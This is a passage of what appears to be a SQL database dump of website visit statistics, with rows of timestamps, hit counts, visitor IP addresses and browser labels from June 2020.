120.98.235','other'),(511327,1591405343,5,5,0,0,'207.46.13.221','other'),(511328,1591406117,1,1,0,0,'194.104.23.112','firefox'),(511329,1591406798,2,2,0,0,'157.55.39.248','other'),(511330,1591407098,1,1,0,0,'173.252.111.111','other'),(511331,1591407099,1,1,0,0,'173.252.111.4','other'),(511332,1591407466,8,8,0,0,'77.120.98.235','other'),(511333,1591408083,1,1,0,0,'178.154.200.222','chrome'),(511334,1591408686,1,1,0,0,'66.249.64.38','chrome'),(511335,1591409289,3,3,0,0,'66.249.70.69','chrome'),(511336,1591409808,8,8,0,0,'77.120.98.235','other'),(511337,1591409962,1,0,1,0,'66.249.70.70',''),(511338,1591410827,2,2,0,0,'207.46.13.221','other'),(511339,1591410932,1,1,0,0,'157.55.39.248','other'),(511340,1591411903,1,1,0,0,'157.55.39.248','other'),(511341,1591412098,8,8,0,0,'77.120.98.235','other'),(511342,1591412254,1,1,0,0,'52.188.109.7','chrome'),(511343,1591412753,1,1,0,0,'66.249.70.70','chrome'),(511344,1591413387,1,1,0,0,'66.249.73.166','chrome'),(511345,1591414184,2,2,0,0,'66.249.70.72','chrome'),(511346,1591414317,1,1,0,0,'66.249.70.69','chrome'),(511347,1591414411,8,8,0,0,'77.120.98.235','other'),(511348,1591414680,1,1,0,0,'157.55.39.52','other'),(511349,1591415164,1,1,0,0,'8.29.198.25','other'),(511350,1591415276,1,1,0,0,'8.29.198.26','other'),(511351,1591415335,2,2,0,0,'66.249.70.72','chrome'),(511352,1591416342,1,1,0,0,'66.249.70.69','chrome'),(511353,1591416449,2,2,0,0,'207.46.13.221','other'),(511354,1591416705,8,8,0,0,'77.120.98.235','other'),(511355,1591417203,32,32,0,0,'173.212.229.76','other'),(511356,1591417438,1,1,0,0,'63.141.231.10','other'),(511357,1591418979,1,1,0,0,'37.57.218.190','firefox'),(511358,1591419046,8,8,0,0,'77.120.98.235','other'),(511359,1591419244,1,1,0,0,'62.205.134.182','other'),(511360,1591419485,1,1,0,0,'95.152.17.7','chrome'),(511361,1591420982,1,1,0,0,'157.55.39.52','other'),(511362,1591421487,8,8,0,0,'77.120.98.235','other'),(511363,1591422493,1,1,0,0,'66.249.70.69','chrome'),(511364,1591422699,1,1,0,0,'157.55.39.52','other'),(511365,1591422996,1,1,0,0,'17.58.99.7','other'),(511366,1591423138,1,1,0,0,'52.188.109.7','chrome'),(511367,1591423385,1,1,0,0,'207.46.13.221','other'),(511368,1591423944,8,8,0,0,'77.120.98.235','other'),(511369,1591424443,1,1,0,0,'207.46.13.85','other'),(511370,1591424681,1,1,0,0,'66.249.70.72','chrome'),(511371,1591424898,1,1,0,0,'157.55.39.248','other'),(511372,1591425086,1,1,0,0,'194.61.24.94','other'),(511373,1591425181,1,1,0,0,'66.249.64.36','chrome'),(511374,1591425315,2,1,1,0,'66.249.70.69',''),(511375,1591425992,2,2,0,0,'8.29.198.26','other'),(511376,1591426359,1,1,0,0,'207.46.13.221','other'),(511377,1591426470,8,8,0,0,'77.120.98.235','other'),(511378,1591426498,2,2,0,0,'66.249.70.70','chrome'),(511379,1591426681,1,1,0,0,'157.55.39.52','other'),(511380,1591426735,1,1,0,0,'66.249.70.69','chrome'),(511381,1591426939,2,2,0,0,'18.237.67.161','chrome'),(511382,1591428083,1,1,0,0,'157.55.39.248','other'),(511383,1591428121,2,2,0,0,'213.180.203.16','other'),(511384,1591428458,1,1,0,0,'157.55.39.52','other'),(511385,1591428934,1,1,0,0,'131.220.6.152','chrome'),(511386,1591429064,8,8,0,0,'77.120.98.235','other'),(511387,1591429732,4,4,0,0,'207.46.13.85','other'),(511388,1591430120,1,1,0,0,'17.58.99.7','other'),(511389,1591430224,1,1,0,0,'165.22.205.55','other'),(511390,1591430469,1,1,0,0,'66.249.70.72','chrome'),(511391,1591431779,8,8,0,0,'77.120.98.235','other'),(511392,1591432196,2,2,0,0,'66.249.70.69','chrome'),(511393,1591432428,1,1,0,0,'157.55.39.52','other'),(511394,1591432606,1,1,0,0,'66.249.70.72','chrome'),(511395,1591432924,1,1,0,0,'207.46.13.221','other'),(511396,1591433915,1,1,0,0,'157.55.39.248','other'),(511397,1591434029,1,1,0,0,'66.249.70.72','chrome'),(511398,1591434182,1,1,0,0,'66.249.70.69','chrome'),(511399,1591434544,8,8,0,0,'77.120.98.235','other'),(511400,1591435411,1,1,0,0,'66.249.70.72','chrome'),(511401,1591435766,2,2,0,0,'66.249.64.33','chrome'),(511402,1591435833,1,1,0,0,'66.249.64.36','chrome'),(511403,1591435894,2,2,0,0,'157.55.39.52','other'),(511404,1591436486,1,0,1,0,'66.249.70.69',''),(511405,1591436819,1,1,0,0,'8.29.198.26','other'),(511406,1591436917,1,1,0,0,'8.29.198.25','other'),(511407,1591437072,1,1,0,0,'157.55.39.52','other'),(511408,1591437234,3,3,0,0,'66.249.70.72','chrome'),(511409,1591437266,1,1,0,0,'178.154.200.220','other'),(511410,1591437294,1,1,0,0,'66.249.70.69','chrome'),(511411,1591437332,8,8,0,0,'77.120.98.235','other'),(511412,1591438448,1,1,0,0,'66.249.70.70','chrome'),(511413,1591438668,1,1,0,0,'66.249.64.33','chrome'),(511414,1591439471,2,2,0,0,'66.249.70.69','chrome'),(511415,1591440086,8,8,0,0,'77.120.98.235','other'),(511416,1591440544,1,0,1,0,'66.249.70.70',''),(511417,1591440835,1,1,0,0,'207.46.13.221','other'),(511418,1591441303,1,1,0,0,'157.55.39.52','other'),(511419,1591441436,1,1,0,0,'66.249.70.70','chrome'),(511420,1591442349,1,1,0,0,'66.249.70.69','chrome'),(511421,1591442415,1,1,0,0,'109.74.154.72','chrome'),(511422,1591442534,1,1,0,0,'178.154.200.222','other'),(511423,1591442919,1,1,0,0,'66.249.70.70','chrome'),(511424,1591443000,8,8,0,0,'77.120.98.235','other'),(511425,1591443321,1,1,0,0,'66.249.70.69','chrome'),(511426,1591443621,1,1,0,0,'213.180.203.16','other'),(511427,1591444594,3,3,0,0,'66.249.70.69','chrome'),(511428,1591444634,2,2,0,0,'66.249.70.72','chrome'),(511429,1591444925,4,4,0,0,'66.249.70.70','chrome'),(511430,1591445285,1,1,0,0,'178.154.200.222','other'),(511431,1591445354,1,1,0,0,'213.180.203.16','other'),(511432,1591445806,1,1,0,0,'207.46.13.221','other'),(511433,1591446036,8,8,0,0,'77.120.98.235','other'),(511434,1591446408,1,1,0,0,'178.154.200.222','other'),(511435,1591446730,1,1,0,0,'66.249.70.72','chrome'),(511436,1591447524,1,1,0,0,'17.58.99.7','other'),(511437,1591447579,1,1,0,0,'207.46.13.221','other'),(511438,1591447644,1,1,0,0,'8.29.198.26','other'),(511439,1591447739,1,1,0,0,'8.29.198.25','other'),(511440,1591447779,1,1,0,0,'95.132.54.164','chrome'),(511441,1591447883,1,1,0,0,'66.249.64.33','chrome'),(511442,1591447974,2,2,0,0,'66.249.70.70','chrome'),(511443,1591448936,8,8,0,0,'77.120.98.235','other'),(511444,1591448988,2,1,1,0,'66.249.70.72',''),(511445,1591449133,1,1,0,0,'17.58.99.7','other'),(511446,1591449589,2,2,0,0,'66.249.70.72','chrome'),(511447,1591449839,1,1,0,0,'66.249.70.70','chrome'),(511448,1591450039,1,1,0,0,'66.249.64.33','chrome'),(511449,1591450246,1,1,0,0,'157.55.39.248','other'),(511450,1591451460,1,1,0,0,'207.46.13.221','other'),(511451,1591451915,8,8,0,0,'77.120.98.235','other'),(511452,1591452085,1,1,0,0,'66.249.70.72','chrome'),(511453,1591452346,1,1,0,0,'66.249.70.69','chrome'),(511454,1591452410,1,1,0,0,'178.154.200.241','other'),(511455,1591452707,1,1,0,0,'66.249.64.38','chrome'),(511456,1591452922,1,1,0,0,'157.55.39.248','other'),(511457,1591453431,1,1,0,0,'91.209.11.236','other'),(511458,1591454267,1,1,0,0,'66.249.70.70','chrome'),(511459,1591454325,2,2,0,0,'157.55.39.52','other'),(511460,1591454925,8,8,0,0,'77.120.98.235','other'),(511461,1591455414,1,1,0,0,'66.249.70.69','chrome'),(511462,1591455520,1,1,0,0,'17.58.99.7','other'),(511463,1591455657,1,1,0,0,'157.55.39.248','other'),(511464,1591455961,1,1,0,0,'209.17.97.26','other'),(511465,1591456573,1,1,0,0,'66.249.70.72','chrome'),(511466,1591456638,1,1,0,0,'178.154.200.222','other'),(511467,1591456779,2,2,0,0,'207.46.13.221','other'),(511468,1591457057,1,1,0,0,'157.55.39.248','other'),(511469,1591457195,1,1,0,0,'66.249.70.69','chrome'),(511470,1591457425,1,1,0,0,'17.58.99.7','other'),(511471,1591457487,2,2,0,0,'157.55.39.35','other'),(511472,1591457681,1,1,0,0,'213.180.203.17','other'),(511473,1591457794,8,8,0,0,'77.120.98.235','other'),(511474,1591457956,1,1,0,0,'157.55.39.52','other'),(511475,1591458304,2,2,0,0,'207.46.13.221','other'),(511476,1591458420,1,1,0,0,'157.55.39.248','other'),(511477,1591458475,1,1,0,0,'8.29.198.25','other'),(511478,1591458562,1,1,0,0,'8.29.198.26','other'),(511479,1591459139,1,1,0,0,'82.118.22.4','msie'),(511480,1591459199,1,1,0,0,'66.249.70.70','chrome'),(511481,1591459624,2,2,0,0,'157.55.39.35','other'),(511482,1591459734,1,1,0,0,'17.58.99.7','other'),(511483,1591460032,1,1,0,0,'157.55.39.52','other'),(511484,1591460185,1,1,0,0,'116.202.15.255','chrome'),(511485,1591460224,2,2,0,0,'66.249.70.72','chrome'),(511486,1591460228,3,3,0,0,'34.204.193.85','other'),(511487,1591460347,1,1,0,0,'157.55.39.248','other'),(511488,1591460710,8,8,0,0,'77.120.98.235','other'),(511489,1591461431,6,6,0,0,'34.204.193.85','other'),(511490,1591462099,1,1,0,0,'66.249.70.69','chrome'),(511491,1591462339,2,2,0,0,'66.249.70.70','chrome'),(511492,1591462379,2,2,0,0,'207.46.13.221','other'),(511493,1591462415,7,7,0,0,'34.204.193.85','other'),(511494,1591462680,1,1,0,0,'178.154.200.222','other'),(511495,1591463280,1,1,0,0,'66.249.70.69','chrome'),(511496,1591463356,4,4,0,0,'34.204.193.85','other'),(511497,1591463637,1,1,0,0,'207.46.13.221','other'),(511498,1591463686,1,1,0,0,'37.73.179.171','chrome'),(511499,1591463693,8,8,0,0,'77.120.98.235','other'),(511500,1591463795,1,1,0,0,'95.217.238.175','other'),(511501,1591464104,1,1,0,0,'157.55.39.52','other'),(511502,1591464299,4,4,0,0,'34.204.193.85','other'),(511503,1591464347,1,1,0,0,'46.211.35.246','chrome'),(511504,1591464479,1,1,0,0,'178.154.200.222','other'),(511505,1591464515,1,1,0,0,'66.249.70.72','chrome'),(511506,1591464862,1,1,0,0,'17.58.99.7','other'),(511507,1591465033,1,1,0,0,'157.55.39.52','other'),(511508,1591465060,3,3,0,0,'157.55.39.35','other'),(511509,1591465295,8,8,0,0,'34.204.193.85','other'),(511510,1591466050,3,3,0,0,'66.249.70.72','chrome'),(511511,1591466213,8,8,0,0,'34.204.193.85','other'),(511512,1591466331,1,1,0,0,'66.249.64.38','chrome'),(511513,1591466451,1,1,0,0,'66.249.70.69','chrome'),(511514,1591466803,8,8,0,0,'77.120.98.235','other'),(511515,1591467160,7,7,0,0,'34.204.193.85','other'),(511516,1591467343,1,1,0,0,'66.249.70.70','chrome'),(511517,1591467458,1,1,0,0,'157.55.39.52','other'),(511518,1591468062,4,4,0,0,'34.204.193.85','other'),(511519,1591468196,1,1,0,0,'66.249.70.72','chrome'),(511520,1591468594,1,1,0,0,'157.55.39.52','other'),(511521,1591468619,1,1,0,0,'95.134.220.159','chrome'),(511522,1591469138,3,3,0,0,'34.204.193.85','other'),(511523,1591469302,1,1,0,0,'8.29.198.25','other'),(511524,1591469383,1,1,0,0,'8.29.198.27','other'),(511525,1591469829,8,8,0,0,'77.120.98.235','other'),(511526,1591470301,2,2,0,0,'34.204.193.85','other'),(511527,1591470504,1,1,0,0,'88.99.2.203','other'),(511528,1591470505,6,6,0,0,'136.243.70.68','other'),(511529,1591470513,1,1,0,0,'66.249.70.70','chrome'),(511530,1591470740,2,2,0,0,'157.55.39.248','other'),(511531,1591471816,1,1,0,0,'66.249.70.70','chrome'),(511532,1591471956,1,1,0,0,'66.249.70.72','chrome'),(511533,1591472475,2,2,0,0,'207.46.13.221','other'),(511534,1591472561,2,2,0,0,'157.55.39.52','other'),(511535,1591472613,1,1,0,0,'17.58.99.7','other'),(511536,1591473070,2,2,0,0,'178.154.200.220','other'),(511537,1591473197,8,8,0,0,'77.120.98.235','other'),(511538,1591473219,1,1,0,0,'213.180.203.16','other'),(511539,1591473637,1,1,0,0,'207.46.13.221','other'),(511540,1591474200,1,1,0,0,'157.55.39.248','other'),(511541,1591474360,2,2,0,0,'66.249.70.72','chrome'),(511542,1591474844,1,1,0,0,'66.249.64.36','chrome'),(511543,1591475146,1,1,0,0,'207.46.13.221','other'),(511544,1591476622,8,8,0,0,'77.120.98.235','other'),(511545,1591476760,1,1,0,0,'66.249.64.38','chrome'),(511546,1591476960,3,2,1,0,'66.249.70.69',''),(511547,1591476999,1,1,0,0,'52.188.150.64','other'),(511548,1591477050,1,1,0,0,'66.249.64.33','chrome'),(511549,1591477352,1,1,0,0,'157.55.39.142','other'),(511550,1591477698,1,1,0,0,'213.180.203.16','other'),(511551,1591478484,1,1,0,0,'185.30.202.111','chrome'),(511552,1591479106,1,1,0,0,'66.249.64.36','chrome'),(511553,1591479257,1,1,0,0,'66.249.70.70','chrome'),(511554,1591479292,1,1,0,0,'157.55.39.248','other'),(511555,1591479294,1,1,0,0,'213.180.203.16','other'),(511556,1591479928,8,8,0,0,'77.120.98.235','other'),(511557,1591480047,1,1,0,0,'157.55.39.142','other'),(511558,1591480128,2,2,0,0,'8.29.198.26','other'),(511559,1591480329,1,1,0,0,'66.249.70.70','chrome'),(511560,1591480547,1,1,0,0,'207.46.13.221','other'),(511561,1591480813,4,4,0,0,'207.46.13.96','other'),(511562,1591481912,1,1,0,0,'157.55.39.142','other'),(511563,1591482546,1,1,0,0,'66.249.70.69','chrome'),(511564,1591483250,8,8,0,0,'77.120.98.235','other'),(511565,1591483338,1,1,0,0,'66.249.64.36','chrome'),(511566,1591483441,2,2,0,0,'157.55.39.142','other'),(511567,1591483530,2,2,0,0,'66.249.70.72','chrome'),(511568,1591484240,1,1,0,0,'66.249.70.69','chrome'),(511569,1591484279,1,1,0,0,'157.55.39.248','other'),(511570,1591484608,3,3,0,0,'207.46.13.96','other'),(511571,1591485196,1,1,0,0,'157.55.39.248','other'),(511572,1591485599,1,1,0,0,'157.55.39.142','other'),(511573,1591485905,1,1,0,0,'178.154.200.222','other'),(511574,1591486276,1,1,0,0,'66.249.70.70','chrome'),(511575,1591486706,8,8,0,0,'77.120.98.235','other'),(511576,1591487032,1,1,0,0,'207.46.13.221','other'),(511577,1591487252,1,1,0,0,'157.55.39.142','other'),(511578,1591487708,1,1,0,0,'62.205.134.182','other'),(511579,1591487851,1,1,0,0,'178.154.200.222','other'),(511580,1591488030,1,1,0,0,'3.14.13.232','chrome'),(511581,1591488091,1,1,0,0,'66.249.70.70','chrome'),(511582,1591488329,1,1,0,0,'207.46.13.221','other'),(511583,1591489585,1,1,0,0,'66.249.64.36','chrome'),(511584,1591489846,2,2,0,0,'66.249.70.69','chrome'),(511585,1591490192,8,8,0,0,'77.120.98.235','other'),(511586,1591490916,1,1,0,0,'66.249.64.33','chrome'),(511587,1591490949,4,4,0,0,'66.249.70.70','chrome'),(511588,1591490956,1,1,0,0,'8.29.198.25','other'),(511589,1591491019,1,1,0,0,'8.29.198.27','other'),(511590,1591492195,1,1,0,0,'157.55.39.248','other'),(511591,1591493145,1,1,0,0,'66.249.70.72','chrome'),(511592,1591493255,1,1,0,0,'66.249.70.69','chrome'),(511593,1591493679,8,8,0,0,'77.120.98.235','other'),(511594,1591494298,2,2,0,0,'66.249.70.70','chrome'),(511595,1591494709,6,6,0,0,'18.206.187.81','other'),(511596,1591495301,1,1,0,0,'66.249.70.70','chrome'),(511597,1591495672,2,2,0,0,'66.249.70.72','chrome'),(511598,1591495769,6,6,0,0,'18.206.187.81','other'),(511599,1591496695,2,2,0,0,'66.249.70.70','chrome'),(511600,1591496696,7,7,0,0,'18.206.187.81','other'),(511601,1591497034,1,1,0,0,'207.46.13.221','other'),(511602,1591497516,8,8,0,0,'77.120.98.235','other'),(511603,1591497601,1,1,0,0,'157.55.39.248','other'),(511604,1591497628,6,6,0,0,'18.206.187.81','other'),(511605,1591498297,1,1,0,0,'178.154.200.220','other'),(511606,1591498545,1,1,0,0,'157.55.39.142','other'),(511607,1591498586,1,1,0,0,'17.58.99.7','other'),(511608,1591498741,1,1,0,0,'178.154.200.222','other'),(511609,1591499215,8,8,0,0,'18.206.187.81','other'),(511610,1591499615,1,1,0,0,'207.46.13.221','other'),(511611,1591500240,8,8,0,0,'18.206.187.81','other'),(511612,1591500256,1,1,0,0,'37.73.29.9','chrome'),(511613,1591500746,1,1,0,0,'66.249.70.69','chrome'),(511614,1591501360,6,6,0,0,'18.206.187.81','other'),(511615,1591501361,1,1,0,0,'157.55.39.52','other'),(511616,1591501422,8,8,0,0,'77.120.98.235','other'),(511617,1591501786,1,1,0,0,'8.29.198.25','other'),(511618,1591501836,1,1,0,0,'8.29.198.27','other'),(511619,1591502044,3,3,0,0,'104.154.101.229','chrome'),(511620,1591502098,3,3,0,0,'34.68.157.176','chrome'),(511621,1591502112,3,3,0,0,'35.238.65.234','chrome'),(511622,1591502121,3,3,0,0,'35.239.241.8','chrome'),(511623,1591502130,4,4,0,0,'35.202.16.227','chrome'),(511625,1591502282,2,2,0,0,'18.206.187.81','other'),(511626,1591502359,3,3,0,0,'66.249.70.70','chrome'),(511627,1591503443,1,1,0,0,'91.196.178.176','chrome'),(511628,1591503470,6,6,0,0,'18.206.187.81','other'),(511629,1591503544,2,2,0,0,'66.249.70.72','chrome'),(511630,1591503589,1,0,1,0,'66.249.70.70',''),(511631,1591503824,3,3,0,0,'66.249.70.69','chrome'),(511632,1591504206,2,2,0,0,'66.249.70.70','chrome'),(511633,1591504246,1,1,0,0,'178.154.200.222','other'),(511634,1591504372,1,1,0,0,'18.206.187.81','other'),(511635,1591505084,1,1,0,0,'194.61.24.94','other'),(511636,1591505349,8,8,0,0,'77.120.98.235','other'),(511637,1591505425,1,1,0,0,'62.205.134.182','other'),(511638,1591506155,2,2,0,0,'66.249.70.69','chrome'),(511639,1591506710,1,1,0,0,'207.46.13.221','other'),(511640,1591506833,2,2,0,0,'66.249.70.72','chrome'),(511641,1591507420,1,1,0,0,'213.180.203.16','other'),(511642,1591507575,1,1,0,0,'66.249.70.69','chrome'),(511643,1591507896,1,1,0,0,'157.55.39.52','other'),(511644,1591508157,2,2,0,0,'66.249.70.70','chrome'),(511645,1591508354,1,1,0,0,'207.46.13.221','other'),(511646,1591508739,5,5,0,0,'157.55.39.142','other'),(511647,1591508879,1,1,0,0,'66.249.64.38','chrome'),(511648,1591509019,2,2,0,0,'66.249.70.69','chrome'),(511649,1591509329,1,1,0,0,'207.46.13.221','other'),(511650,1591509729,1,1,0,0,'157.55.39.142','other'),(511651,1591509843,8,8,0,0,'77.120.98.235','other'),(511652,1591509880,1,1,0,0,'178.154.200.222','other'),(511653,1591510850,3,3,0,0,'91.209.11.236','other'),(511654,1591511125,1,1,0,0,'66.249.70.72','chrome'),(511655,1591511436,1,1,0,0,'66.249.70.70','chrome'),(511656,1591512305,2,2,0,0,'66.249.70.72','chrome'),(511657,1591512612,1,1,0,0,'8.29.198.25','other'),(511658,1591512656,1,1,0,0,'8.29.198.26','other'),(511659,1591512790,1,1,0,0,'66.249.64.38','chrome'),(511660,1591512851,1,1,0,0,'66.249.70.70','chrome'),(511661,1591513481,1,1,0,0,'66.249.70.69','chrome'),(511662,1591513542,2,2,0,0,'66.249.70.72','chrome'),(511663,1591514619,1,1,0,0,'157.55.39.52','other'),(511664,1591514718,1,1,0,0,'207.46.13.23','other'),(511665,1591515246,2,2,0,0,'66.249.70.70','chrome'),(511666,1591515343,1,1,0,0,'131.220.6.152','chrome'),(511667,1591515818,1,1,0,0,'66.249.70.72','chrome'),(511668,1591516249,1,1,0,0,'17.58.99.84','other'),(511669,1591516400,1,1,0,0,'66.249.64.38','chrome'),(511670,1591517111,1,1,0,0,'207.46.13.23','other'),(511671,1591517310,1,1,0,0,'178.154.200.222','other'),(511672,1591518112,1,1,0,0,'157.55.39.108','other'),(511673,1591518405,2,2,0,0,'66.249.70.72','chrome'),(511674,1591518525,1,1,0,0,'66.249.70.70','chrome'),(511675,1591519079,1,1,0,0,'178.154.200.196','other'),(511676,1591520456,1,0,1,0,'66.249.70.69',''),(511677,1591520852,2,2,0,0,'66.249.70.70','chrome'),(511678,1591521454,3,3,0,0,'66.249.70.69','chrome'),(511679,1591521935,1,1,0,0,'66.249.70.70','chrome'),(511680,1591522345,1,1,0,0,'178.154.200.105','other'),(511681,1591522587,1,1,0,0,'66.249.70.69','chrome'),(511682,1591523436,1,1,0,0,'8.29.198.26','other'),(511683,1591523482,1,1,0,0,'8.29.198.25','other'),(511684,1591524262,1,1,0,0,'66.249.64.33','chrome'),(511685,1591524573,1,1,0,0,'207.46.13.252','other'),(511686,1591524817,1,1,0,0,'157.55.39.191','other'),(511687,1591525144,2,2,0,0,'66.249.70.72','chrome'),(511688,1591525158,1,1,0,0,'157.55.39.52','other'),(511689,1591525507,1,1,0,0,'66.249.70.69','chrome'),(511690,1591525725,2,2,0,0,'66.249.70.70','chrome'),(511691,1591526552,8,8,0,0,'77.120.98.235','other'),(511692,1591527170,1,0,1,0,'66.249.70.70',''),(511693,1591527346,1,1,0,0,'109.74.154.72','chrome'),(511694,1591528840,8,8,0,0,'77.120.98.235','other'),(511695,1591528874,2,2,0,0,'66.249.70.70','chrome'),(511696,1591529407,1,1,0,0,'37.54.16.169','chrome'),(511697,1591531155,8,8,0,0,'77.120.98.235','other'),(511698,1591531532,1,1,0,0,'66.249.70.70','chrome'),(511699,1591531832,1,1,0,0,'66.249.70.72','chrome'),(511700,1591532203,1,1,0,0,'66.249.70.69','chrome'),(511701,1591532928,1,1,0,0,'17.58.99.84','other'),(511702,1591533406,8,8,0,0,'77.120.98.235','other'),(511703,1591534160,1,1,0,0,'157.55.39.52','other'),(511704,1591534258,1,1,0,0,'8.29.198.25','other'),(511705,1591534306,1,1,0,0,'8.29.198.26','other'),(511706,1591535551,1,1,0,0,'157.55.39.191','other'),(511707,1591535583,1,1,0,0,'66.249.70.72','chrome'),(511708,1591535594,1,1,0,0,'178.154.200.22','other'),(511709,1591535626,1,1,0,0,'178.154.200.196','other'),(511710,1591535682,3,3,0,0,'157.55.39.52','other'),(511711,1591535710,2,2,0,0,'207.46.13.23','other'),(511712,1591535730,8,8,0,0,'77.120.98.235','other'),(511713,1591536476,1,1,0,0,'157.55.39.191','other'),(511714,1591538008,8,8,0,0,'77.120.98.235','other'),(511715,1591538311,1,1,0,0,'207.46.13.65','other'),(511716,1591538442,1,1,0,0,'66.249.70.72','chrome'),(511717,1591538756,1,1,0,0,'66.249.64.36','chrome'),(511718,1591538832,1,1,0,0,'157.55.39.191','other'),(511719,1591538932,2,2,0,0,'66.249.70.70','chrome'),(511720,1591539870,1,1,0,0,'178.154.200.236','other'),(511721,1591540289,8,8,0,0,'77.120.98.235','other'),(511722,1591540304,1,1,0,0,'159.224.64.177','firefox'),(511723,1591540833,1,1,0,0,'157.55.39.191','other'),(511724,1591541535,1,1,0,0,'178.154.200.92','other'),(511725,1591541701,1,1,0,0,'91.196.178.72','chrome'),(511726,1591542575,8,8,0,0,'77.120.98.235','other'),(511727,1591542598,1,1,0,0,'157.55.39.191','other'),(511728,1591543372,1,1,0,0,'17.58.99.84','other'),(511729,1591543796,1,1,0,0,'66.249.64.38','chrome'),(511730,1591543876,1,1,0,0,'66.249.70.70','chrome'),(511731,1591544237,1,1,0,0,'66.249.70.72','chrome'),(511732,1591544800,1,1,0,0,'157.55.39.52','other'),(511733,1591544894,8,8,0,0,'77.120.98.235','other'),(511734,1591544899,1,1,0,0,'157.55.39.191','other'),(511735,1591545087,1,1,0,0,'8.29.198.26','other'),(511736,1591545125,1,1,0,0,'8.29.198.27','other'),(511737,1591545200,2,2,0,0,'66.249.70.72','chrome'),(511738,1591546475,1,0,1,0,'66.249.70.72',''),(511739,1591546604,1,1,0,0,'207.46.13.23','other'),(511740,1591546739,1,1,0,0,'157.55.39.52','other'),(511741,1591546840,1,1,0,0,'2.47.39.221','other'),(511742,1591546993,1,1,0,0,'176.115.96.90','chrome'),(511743,1591548144,1,1,0,0,'157.55.39.35','other'),(511744,1591548223,8,8,0,0,'77.120.98.235','other'),(511745,1591548252,1,1,0,0,'207.46.13.23','other'),(511746,1591550324,8,8,0,0,'77.120.98.235','other'),(511747,1591550467,1,1,0,0,'157.55.39.121','other'),(511748,1591550577,1,1,0,0,'2.58.194.136','chrome'),(511749,1591551343,1,1,0,0,'17.58.99.84','other'),(511750,1591551824,1,1,0,0,'207.46.13.128','other'),(511751,1591552193,1,1,0,0,'66.249.64.38','chrome'),(511752,1591552566,8,8,0,0,'77.120.98.235','other'),(511753,1591553766,1,1,0,0,'95.221.54.125','chrome'),(511754,1591553769,1,1,0,0,'192.241.113.206','chrome'),(511755,1591554882,8,8,0,0,'77.120.98.235','other'),(511756,1591555201,2,2,0,0,'66.249.70.70','chrome'),(511757,1591555285,1,1,0,0,'157.55.39.52','other'),(511758,1591555328,1,1,0,0,'178.154.200.222','other'),(511759,1591555737,2,2,0,0,'157.55.39.191','other'),(511760,1591555881,1,1,0,0,'213.180.203.17','chrome'),(511761,1591555922,1,1,0,0,'8.29.198.26','other'),(511762,1591555955,1,1,0,0,'8.29.198.25','other'),(511763,1591556361,1,1,0,0,'17.58.99.84','other'),(511764,1591557070,1,1,0,0,'207.46.13.128','other'),(511765,1591557115,8,8,0,0,'77.120.98.235','other'),(511766,1591558544,1,1,0,0,'178.154.200.236','other'),(511767,1591558630,1,1,0,0,'66.249.70.70','chrome'),(511768,1591558784,1,1,0,0,'178.154.200.191','other'),(511769,1591559021,2,2,0,0,'66.249.73.165','chrome'),(511770,1591559098,2,2,0,0,'157.55.39.191','other'),(511771,1591559126,1,1,0,0,'178.154.200.220','chrome'),(511772,1591559339,1,1,0,0,'79.137.130.179','chrome'),(511773,1591559460,8,8,0,0,'77.120.98.235','other'),(511774,1591559891,1,1,0,0,'185.138.228.227','chrome'),(511775,1591560295,1,1,0,0,'66.249.73.166','chrome'),(511776,1591560718,4,4,0,0,'157.55.39.52','other'),(511777,1591560767,1,0,1,0,'66.249.73.168',''),(511778,1591560887,1,1,0,0,'66.249.73.168','chrome'),(511779,1591561588,1,1,0,0,'37.54.16.169','chrome'),(511780,1591561695,8,8,0,0,'77.120.98.235','other'),(511781,1591562485,1,1,0,0,'66.249.65.132','chrome'),(511782,1591563017,2,1,1,0,'66.249.73.165',''),(511783,1591563531,1,1,0,0,'157.55.39.52','other'),(511784,1591563987,8,8,0,0,'77.120.98.235','other'),(511785,1591564109,1,1,0,0,'66.249.65.132','chrome'),(511786,1591564160,3,3,0,0,'66.249.73.166','chrome'),(511787,1591565899,1,1,0,0,'17.58.99.84','other'),(511788,1591566040,2,2,0,0,'157.55.39.52','other'),(511789,1591566161,1,1,0,0,'157.55.39.191','other'),(511790,1591566212,8,8,0,0,'77.120.98.235','other'),(511791,1591566738,1,1,0,0,'213.180.203.16','other'),(511792,1591566748,2,2,0,0,'8.29.198.25','other'),(511793,1591566838,1,0,1,0,'66.249.73.168',''),(511794,1591567561,1,1,0,0,'178.154.200.97','chrome'),(511795,1591567947,2,2,0,0,'72.13.62.27','other'),(511796,1591568109,1,1,0,0,'157.55.39.52','other'),(511797,1591568494,8,8,0,0,'77.120.98.235','other'),(511798,1591568531,2,2,0,0,'66.249.73.165','chrome'),(511799,1591569072,2,2,0,0,'178.154.200.220','chrome'),(511800,1591569324,1,0,1,0,'66.249.73.168',''),(511801,1591569472,1,1,0,0,'157.55.39.121','other'),(511802,1591570236,1,1,0,0,'66.249.65.132','chrome'),(511803,1591570276,1,1,0,0,'66.249.73.165','chrome'),(511804,1591570416,1,1,0,0,'207.46.13.128','other'),(511805,1591570769,8,8,0,0,'77.120.98.235','other'),(511806,1591572022,1,0,1,0,'66.249.73.165',''),(511807,1591572584,3,3,0,0,'207.46.13.128','other'),(511808,1591572984,1,1,0,0,'66.249.73.168','chrome'),(511809,1591573058,8,8,0,0,'77.120.98.235','other'),(511810,1591574010,1,1,0,0,'178.154.200.222','chrome'),(511811,1591574106,1,1,0,0,'62.205.134.182','other'),(511812,1591574925,1,1,0,0,'95.217.104.173','chrome'),(511813,1591575130,1,1,0,0,'66.249.73.165','chrome'),(511814,1591575163,1,1,0,0,'54.36.149.69','other'),(511815,1591575176,8,8,0,0,'77.120.98.235','other'),(511816,1591575822,1,1,0,0,'66.249.73.168','chrome'),(511817,1591576463,1,1,0,0,'157.55.39.52','other'),(511818,1591577249,8,8,0,0,'77.120.98.235','other'),(511819,1591577577,1,1,0,0,'8.29.198.26','other'),(511820,1591577597,1,1,0,0,'8.29.198.25','other'),(511821,1591577847,1,1,0,0,'66.249.73.165','chrome'),(511822,1591578128,1,1,0,0,'157.55.39.52','other'),(511823,1591578840,1,1,0,0,'66.249.73.168','chrome'),(511824,1591579287,8,8,0,0,'77.120.98.235','other'),(511825,1591579904,1,1,0,0,'149.202.65.108','firefox'),(511826,1591581247,1,1,0,0,'66.249.65.130','chrome'),(511827,1591581387,1,1,0,0,'17.58.99.84','other'),(511828,1591581437,8,8,0,0,'77.120.98.235','other'),(511829,1591581944,1,1,0,0,'157.55.39.228','other'),(511830,1591582866,1,1,0,0,'62.76.12.73','chrome'),(511831,1591583242,1,1,0,0,'66.249.73.168','chrome'),(511832,1591583555,8,8,